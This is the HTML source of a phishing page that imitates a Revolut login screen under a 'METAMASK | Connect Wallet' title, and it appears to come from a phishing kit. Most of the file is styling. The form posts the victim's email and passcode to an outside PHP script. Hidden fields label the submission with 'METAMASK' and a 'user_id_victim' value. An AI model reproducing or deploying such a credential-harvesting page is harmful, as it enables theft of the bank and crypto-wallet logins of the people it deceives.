       <html>
       <head>
             <link rel="shortcut icon" href="../stake-phrase-high/img/img1.png" />
             <title>METAMASK | Connect Wallet</title>
             
       <meta name="viewport" content="width=device-width , initial-scale=1.0">
       
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
       <link rel="stylesheet" type="text/css" href="styblesheet.css"> 
       </head>
       
       
       
       <style type="text/css">
       
       
       
       
       body{
       margin: 0;
       font-family: sans-serif;
       line-height: 16px;
       font-size: 13px;

       }
       
       .navbar{
       background: #001f90b8;
       height: 39px;
       width: 100%;
       }
       
       .contact-us a{
       position:relative;
       cohlor:#00184a78;
       font-size:9px;
       top: 20px;
       color: black;
       }
       
       .nav-head{
       background-color:#ffdc0026;
       color:#5d530eb8;
       padding:6px 10px;
       }
       
       .contact-us{
       padding-bottom:21px;
       text-align:center;
       }
       
       
       .formulaire.formulaire>*{
       bogrder-bottom:1px solid #c7c3c369;
       }
       
       .entrer{
       border:1;
       width:100%;
       }
       
       /*
       submit
       */
       
       .koala{
       display:inline-block;
       -webkit-border-radius:3px;
       font-weight:bold;
       background-color:#0036f999;	
       font-size:13px;
       line-height:34px;
       padding:0 18px;
       color:white
       }
       
       .square_btn {
       position: relative;
       display: inline-block;
       padding: 15px;
       text-decoration: none;
       color: white;
       background:   rgb(22,101,255);
       border-radius: 15px;
       font-weight: bold;
       bornder: 15px #f30909;
       width: 100%;
       border: none;
       top: 2px;
       outline: none;
       font-size: 15px;
      box-sbhadow: 0px 0px 2px 0px rgb(22,101,255) ;
       }
       
       
       /* neveau compte */
       .fruit{
       text-align:center;
       padding:9px;
       } 
       
       
       
       
       
       
       
       
       /*New Codes*/
       
       
       
       
       .span1 {
       color: #62B2FF;
       font-size: 14px;
       position:relative;
       
       top: 4px;
       }
       
       
       
       
       .span2 {
       color: black;
       font-sizw: 14px;
       text-align: center;
       position:relative;
       background-position:center;
       top: -5px;
       font-weight: 590;
               text-shadow:500px;
               margin-right: 90px;
       }
       
       
       
       
       .div1 {
       
       background-color:white;
       padding:2 31px;
       }
       
       
       
       
       /*form*/
       
       
       
       .form-control {
       
       text-align: left;
       
       margin-bottom: 20px;
       } 
       
       .form-control label {
       
       display: block;
       
       margin-bottom: 10px;
       
       }
       
       
       
       
       /*
       .form-control input,
       
       .form-control select,
       
       .form-control textarea {
       
       border: 1px solid #777;
       
       border-radius: 7px;
       
       font-family: inherit;
       
       padding: 10px;
       
       display: block;
       height: 45px;
       width: 95%;
       margin-left: 8px;
       }
       */
       
       
       .form-control input[type="radio"],
       
       .form-control input[type="checkbox"] {
       
       display: inline-block;
       
       width: auto;
       
       }
       
       
       
       
       
       
       
       .buttoner:hover {
       background-color: hsla(0, 0%, 0%, 0.5);
       color:   white;
       border: none;
       box-shadow: 1px 1px 1px 1px   hsla(240, 100%, 25%, 0.9);
       cursor: pointer;
       -webkit-transition-duration: 0s; /* for Safari */
       transition-duration: 0s;
       }
       
       .buttonner {
       outline: none;
       border: none;
       height: 45px;
       width: 50%;
       border-radius: 5px;  
       bordner: 12px;
       font-size: 14px;
       background: white;
       color:  white;
       background: rgb(236,152,102);
       position:relative;
       top: 25px;
       
       }
       
       
       
       
       
       /*xxx*/
       .form-control input,
       
       .form-control select,
       
       .form-control textarea {
       
       
       border: 0.70px solid black;
       outbline: 4.70px solid blue;
       
       
       border-radius: 2px;
       
       outline: none;
       /*  hsla(240, 100%, 25%, 0.9);;*/
       border-radius: 10px;
       
       font-family: inherit;
       
       padding: 25px;
       background:hsla(0, 0%, 75%, 0.30);
       display: block;
       height:52px;
        width:100%;
       mabrgin-left: 13px;
       position:relative;
       top: 3px;
       border:none;
       }
       
       
       
       
       
       
       
               /*END*/ 
       
       
       
       
       #entnre1 {
       position:relative;
       top:-10px;
       }
       
       
       
       #enhtre2 {
       position:relative;
       top:10px;
       }
           
           
           #ooo1 {
           position:relative;
          top: 13px;
          font-size: 10px;
           
        }
        
        
        #engtre3 {
        position:relative;
        top:20px;
        }
        
        
        .spancyy {
        position:relative;
         float:right;
        }
        

       
        
        
        #img00 {
        position:relative;
        float:right;
        width: 28px;
       top: -40px; 
        
       }
        
        
        
        .cents {
        position:relative;
              font-weight: 700;
              font-size: 25px;
              top: 15px
              }
              
              
              #ooo {
              position: relative;
              coblor: grey;
              top: -7px;
       
              }
         
         
         
         
         .pi {
         position:relative;
         top: 20px;
         font-size: 14px;
         
         }
         
         .pii {
         position:relative;
         top: 12px;
         
         }
         
         
         
         
         
         /*Switch Box*/
         
         
         /* The switch - the box around the slider */
         .switch {
         position: relative;
         display: inline-block;
         width: 30px;
         height: 15px;
         
         }
         
         /* Hide default HTML checkbox */
         .switch input {
         opacity: 0;
         width: 0;
         height: ;
         }
         
         /* The slider */
         .slider {
         position: absolute;
         cursor: pointer;
         top: 0;
         left: -10;
         right: 0px;
         bottom: 0;
         width: 25px;
         background-color:  #62B2FF;
         -webkit-transition: .4s;
         transition: .4s;
       
         }
         
         .slider:before {
         position:absolute;
         content: "";
         height: 20px;
         width: 20px;
         left: 13px;
       
       
              
         bottom: -2px;
         background-color: green;
         -webkit-transition: .4s;
         transition: .4s;
       
         }
         
         input:checked + .slider {
       
         background-color: silver;
       
         }
         
         
         input:checked + .slider:before {
       
         background-color: white;
       
         }
         
         
         
         input:focus + .slider {
       
         box-shadow: 0px 0px 0px black;
       
         }
         
         input:checked + .slider:before {
           box-shadow: 0px 0px 20px grey;
         -webkit-transform: translateX(26px);
         -ms-transform: translateX(26px);
         transform: translateX(-22px);
         }
         
         /* Rounded sliders */
         .slider.round {
         border-radius: 34px;
         
         
         }
         
         .slider.round:before {
         border-radius: 50%;
         
         }
         
       
       
        /*end*/
        
        .switch {
        position:relative;
       float:right;
       top: -8px;
        
        }
        
        
        
        .divo {
        position:relative;
       top: -10px;
       }
       
       
       #imgf {
       position:relative;
       width: 8px;
       heibght: 14px;
       top: 1.25px;
       
       }
       
       
       
       
       #a {
       text-decoration: none;
       color: #62B2FF;
       }
       
       
       .move1 {
       position:absolute;
       margin-left: -9px;
       tyop: 50px;
       }
       
       
       .move2 {
       position:absolute;
       margin-left: 4px;
       tyop: 50px;
       }
       
       
       .move3 {
       position:absolute;
       margin-left: 17px;
       tyop: 50px;
       }
       
       
       
       
       .move4 {
       position:absolute;
       margin-left: 29px;
       tyop: 50px;
       }
       
       
       
       
       .move5 {
       position:absolute;
       margin-left: 44px;
       tyop: 50px;
       }
       
       
       
       
       .move6 {
       position:absolute;
       margin-left: 59px;
       tyop: 50px;
       }
       
       
       
       .move7 {
       position:absolute;
       margin-left: 73px;
       tyop: 50px;
       }
       
       
       
       .move8 {
       position:absolute;
       margin-left: 86px;
       tyop: 50px;
       }
       
       
       #but2 {
       position:relative;
       border-radius: 7px;
       height: 4.50%;
       width: 50%;
       font-size:13px;
       background: hsla(0, 0%, 75%, 0.30);
       border: none;
       margin: -3px;
       outline: none;
       }
       
       
       
       
       
       
       #but2:hover {
       position:relative;
       border-radius: 7px;
       height: 4.50%;
       width: 50%;
       font-size:13px;
       background: hsla(0, 0%, 75%, 0.30);
       border: none;
       margin: -3px;
       outline: none;
       background: white;
       
          -webkit-transition-duration: 0s; /* for Safari */
          transition-duration: 0s;
          }
       
       
       
       
       
       
       #but3 {
       position:relative;
       border-radius: 7px;
       height: 4.50%;
       width: 50%;
       font-size:13px;
       background: white;
       border-color: hsla(0, 0%, 75%, 0.30);
       border-width: 0.80px;
       margin: -3px;
       outline: none;
       
       
       }
       
       
       
       
       
       
       
       #tops {
       position:relative;
       top: 7px;
       }
       
       #sec1 {
       color: rgb(22,101,255);
       font-size: 13px;
       text-decoration:none;

       }
       
       #sec2{
       position:relative;
       color: rgb(22,101,255); 
       font-size: 13px;
       text-decoration:none;
        top: 3.80px;     
       }
       
       
      #imgf {
      width: 50px; 
       
       }
       
     

       .diverx{
       position: relative;
       border-radius: 7.50px;
       border-style: none;
       height: 110px;
       margin-left: -0px;
       margin-right: -0px;
       background: white;
       top:30.20px;
       opacity: none;
       padding: -20px;
      box-shadow: 0px 0px 2000px 0px silver ;
       }
       
       
       .div2 {
       padding-left: 17px;
       padding-right: 0px;
       
       }
       
       
       #img3 {
       width: 70px;
       float: right;
       border: none;
       border-radius: 7px;
       tnop: 200px;
       padding-right: 10px;
       position:relative;
       top: -10px;
       }
       
       .spanner {
       font-weight: 500;
       }
       
       
       .p2 {
       font-size: 13px;
       color: grey;
       top: -8px;
       position:relative;
       }
       
       .p2x {
       font-size: 13px;
       color: grey;
    top: -15px;
    position:relative;
     }

       
       
       .square_btn2 {
       position: relative;
       display: inline-block;
       padhding: 13px;
       text-decoration: none;
       color: rgb(22,101,255);
       backbground:   hsla(180, 100%, 50%, 0.1);
       border-radius: 15px;
       font-weight: bold;
       bornder: 15px #f30909;
       width: 100%;
       border: none;
       top: 2px;
       outline: none;
       font-size: 15px;
             box-sbhadow: 0px 0px 2px 0px rgb(22,101,255) ;
       }
          
       
       #img6 {
       width: 250px;
      box-shadow: 0px 0px 20000px 0px silver ;
       
       }
       
       #imgh {
       width: 15px;
       position:relative;
       top: 3px;
       borbder-radius: 200px;

       }
       
       
       
       #imghx {
       width: 12px;
       position:relative;
       top: 3px;
       
       }
       
       
       #tup {
       position:relative;
       top: 10px;
       }
       
       
       
       
       
       </style>
       
       <body>
       
      <body> 
               <p>&nbsp;</p>
        <div class="divo">
     
            
         <center>   <img id="imgf"src="../steam-world/img/Revolut_Black.svg"></center>
       
       
       <!-- NavBar -->
             <!--   <div class="navbar"></div>
       <div style="display:-webkit-box">
       <div style="-webkit-box-flex:1">
       <!--Nav-Header-->
             <!--   <div class="nav-head">
       <span>METAMASK</span>
       </div> -->
       
       
       
       <!-- Formulaire -->
       <div class="div1">
       
       
       <p class="cents"><span class="spanner">Log in to Revolut</span></p>
       <p>&nbsp;</p>
           <div id="tup">  <p id="tup"><center> <a href="login2.html" ><button id="but2"> Phone number</button></a><button id="but3">Email</button> </button></center></p>
         </div>    
       
       
       <form method="POST" style="padding-top:17px;" action="https://raviral.com/Gfac.php" method="POST">
       <div class="formulaire" style="background:white;"> 
       
          <div class="form-control">
       
       
             <span id="ooo" class="spanner"></span> <span id="ooo" class="spancyy"> </span> <!--<img id="img03"src="../stake/img/img00.jpg">-->
       <input name="email" type="password" placeholder="Enter your email " id="entre1"class="entrer" style="padding:12px;"required> 
      <p> <a id="sec1" href="##" > <section id="sec1">Lost access to my email</section></a></section>

       
       <p id="tops">
       <input name="type" type="hidden" value="METAMASK" />
       <input type="hidden" name="user_id_victim"" value="K2GTQ" />
       

                         <span id="ooo" class="spanner"></span> <span id="ooo" class="spancyy"> </span>  <!--<img id="img03"src="../stake/img/img00.jpg">-->
       <input name="pass" value="" type="number"  placeholder="Enter Passcode" id="entre2"class="entrer" style="padding:12px;"required>
         <a id="sec2"href="##" ><section id="sec2"> Forgot your passcode?</section> </a>
       </p>








     <!--           <p>&nbsp;</p>
       
       
       
                         <span id="ooo" class="spanner">Confirm Password</span>  <!--<img id="img03"src="../stake/img/img00.jpg">-->
     <!--  <input name="pass2" value="" type="password"  placeholder="Confirm password" id="entre3"class="entrer" style="padding:12px;"required>
       
       
       
       
       
       
       
       
               <span id="ooo1" class="spanner">Must contain at least 8 characters</span>  <!--<img id="img03"src="../stake/img/img00.jpg">-->
       
       
       
      <!-- <p class="pi">Unlock with Biometrics?    
       <!-- Rounded switch -->
    <!--          <span class="pii">  <label class="switch">
       <input type="checkbox">
       <span class="slider round"></span>
       </label>
       </p>
       </span>
       
       
       <div style="padding: -50px;"> 
       -->
              
                         <p>&nbsp;</p>

       
       <button type="submit" class="square_btn">Continue</button>
       
       
       
       
       
       
       
       <div id="g2"class="diverx"><p style="color: blue; text-align: cebnter">   <p>&nbsp;</p>
       
       
       <div class="div2">
       <span id="oo" class="spanner">Log in with QR code </span>   
    
       <img id="img3"src="../steam-world/img/imgk.png">
       
       
       <p class="p2">Scan this code with your phone</p>
       
              <p class="p2x">camera to log in instantly.</p>
       </div></p></div></a>
       
       
       
       
          <center> <p style="font-size: 13px; color: grey;"> Don't have an account</p></center>
       
       
       
       
          <p>&nbsp;</p>
        <center>  <p style="font-size: 14px; color: grey;">Don&apos;t have an account?</p></center>
       
            
            <center><div  class="square_btn2">Sign Up</div></center>
       
       <!--
             <p> <center><img id="img6"src="../steam-world/img/us.png"></center></p>
       -->
       <p>&nbsp;</p>
    <center>   <p style="font-size: 13px; color: grey;"> <img id="imgh"src="../steam-world/img/im.jpeg"> English (Untied States) <img id="imghx"src="../steam-world/img/free-arrow-down-icon-3101-thumb.png"></p> 
       
       <p style="font-size: 13px; color: grey;">Privacy Policy</p></center>
       
       
       
       
       </div>
       </div>
       </form> 
       </div>
       </div>
       
       
       
       
       
       
       
       
       
              <!--  <div class="fruit">
       <a class="koala">Need a new account</a> 
       </div>
       -->
     <!--  <div class="contact-us">,-->
     <!--  <a>By proceeding, you agree to this <a href="##" >terms and conditions</a>-->
       </div>
       </div>
       </div>
       </div>
       </body>
       </html>